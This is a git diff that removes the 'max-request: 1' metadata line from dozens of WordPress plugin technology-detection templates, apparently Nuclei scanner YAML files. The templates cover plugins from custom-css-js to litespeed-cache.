a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 